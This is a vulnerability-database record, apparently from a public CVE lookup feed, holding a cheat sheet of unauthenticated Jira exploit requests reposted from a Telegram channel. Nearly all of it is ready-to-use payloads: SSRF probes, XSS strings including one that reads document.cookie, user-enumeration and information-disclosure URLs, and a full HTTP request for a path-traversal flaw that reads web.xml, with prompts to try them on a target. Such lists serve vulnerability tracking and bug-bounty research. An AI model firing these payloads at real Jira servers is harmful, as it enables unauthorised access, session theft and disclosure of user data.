{"uuid": "ff3e55e0-2287-4576-ad9f-83d2427ec089", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2020-14179", "type": "published-proof-of-concept", "source": "https://t.me/lostsec/164", "content": "# Unauthenticated Jira CVEs\n1. CVE-2017-9506 (SSRF)\nhttps:///plugins/servlet/oauth/users/icon-uri?consumerUri=\n2. CVE-2018-20824 (XSS)\nhttps:///plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)\n3. CVE-2019-8451 (SSRF)\nhttps:///plugins/servlet/gadgets/makeRequest?url=https://:1337@example.com\n4. CVE-2019-8449 (User Information Disclosure)\nhttps:///rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true\n5. CVE-2019-8442 (Sensitive Information Disclosure)\nhttps:///s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml\n6. CVE-2019-3403 (User Enumeration)\nhttps:///rest/api/2/user/picker?query=\n7. CVE-2020-14181 (User Enumeration)\nhttps:///secure/ViewUserHover.jspa?username=\n8. CVE-2020-14178 (Project Key Enumeration)\nhttps:///browse.\n9. CVE-2020-14179 (Information Disclosure)\nhttps:///secure/QueryComponent!Default.jspa\n10. CVE-2019-11581 (Template Injection)\n/secure/ContactAdministrators!default.jspa\n\n* Try the SSTI Payloads\n11.   CVE-2019-3396 (Path Traversal)\nPOST /rest/tinymce/1/macro/preview HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en-US,en;q=0.5 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\nReferer: {{Hostname}}\nContent-Length: 168\nConnection: close\n\n{\"contentId\":\"786457\",\"macro\":{\"name\":\"widget\",\"body\":\"\",\"params\":{\"url\":\"https://www.viddler.com/v/23464dc5\",\"width\":\"1000\",\"height\":\"1000\",\"_template\":\"../web.xml\"}}}\n\n*Try above request with the Jira target\n12.   CVE-2019-3402 (XSS)\nhttps:///secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search\n/secure/ConfigurePortalPages!default.jspa?view=popular\n/secure/ManageFilters.jspa?filterView=search&Search=Search&filterView=search&sortColumn=favcount&sortAscending=false\n/secure/ContactAdministrators!default.jspa\n/servicedesk/customer/user/login\n/issues/?jql=\n/plugins/servlet/oauth/users/icon-uri?consumerUri=http://google.com\n/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true\n/plugins/servlet/gadgets/makeRequest?url=https://victomhost:1337@example.com\n/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)\n/secure/QueryComponent!Default.jspa\n/secure/ViewUserHover.jspa\n/ViewUserHover.jspa?username=Admin\n/rest/api/2/dashboard?maxResults=100\n/pages/%3CIFRAME%20SRC%3D%22javascript%3Aalert(\u2018XSS\u2019)%22%3E.vm\n/rest/api/2/user/picker?query=admin\n/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml\n/rest/api/2/user/picker?query=admin\n/s/\n/plugins/servlet/oauth/users/icon-uri?consumerUri=https://www.google.nl\n/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=x2rnu%3Cscript%3Ealert(1)%3C%2fscript%3Et1nmk&Search=Search\nConfigurePortalPages.jspa\n/plugins/servlet/Wallboard/?dashboardId=10100&dashboardId=10101&cyclePeriod=(function(){alert(document.cookie);return%2030000;})()&transitionFx=none&random=true\nREPORTS:- \nhttps://hackerone.com/reports/713900\nhttps://hackerone.com/reports/1103582\nhttps://hackerone.com/reports/380354\nhttps://hackerone.com/reports/197726\nhttps://hackerone.com/reports/632808", "creation_timestamp": "2024-03-18T07:23:33.000000Z"}